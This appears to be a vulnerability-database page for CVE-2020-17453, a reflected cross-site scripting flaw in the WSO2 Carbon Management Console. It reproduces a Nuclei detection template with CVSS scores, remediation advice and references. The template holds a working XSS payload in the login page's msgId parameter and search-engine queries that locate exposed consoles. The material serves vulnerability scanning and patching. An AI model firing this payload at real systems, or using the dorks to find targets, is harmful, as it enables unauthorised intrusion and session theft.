Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-17453
HistoryMar 24, 2021 - 3:35 p.m.

WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting

2021-03-2415:35:32
ProjectDiscovery
github.com
19
cve-2020
wso2
security
xss
vulnerability
management
console
patch
upgrade
exploitation

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.008

Percentile

82.2%

WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.

id: CVE-2020-17453

info:
  name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability.
  reference:
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17453
    - https://twitter.com/JacksonHHax/status/1374681422678519813
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1132/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-17453
    cwe-id: CWE-79
    epss-score: 0.00845
    epss-percentile: 0.82114
    cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.favicon.hash:1398055326
    fofa-query: icon_hash=1398055326
    google-query: inurl:"carbon/admin/login"
  tags: cve2020,cve,xss,wso2

http:
  - method: GET
    path:
      - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'';alert('document.domain')//';"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402200405d06b7c6abb849ba4dc61041541264ed150d1897a323f895961d136ee6889022072e4173dc43e17f87b8dfc2e4ed666bb4aa8e51f6519916f191fd0377e8acc5a:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.008

Percentile

82.2%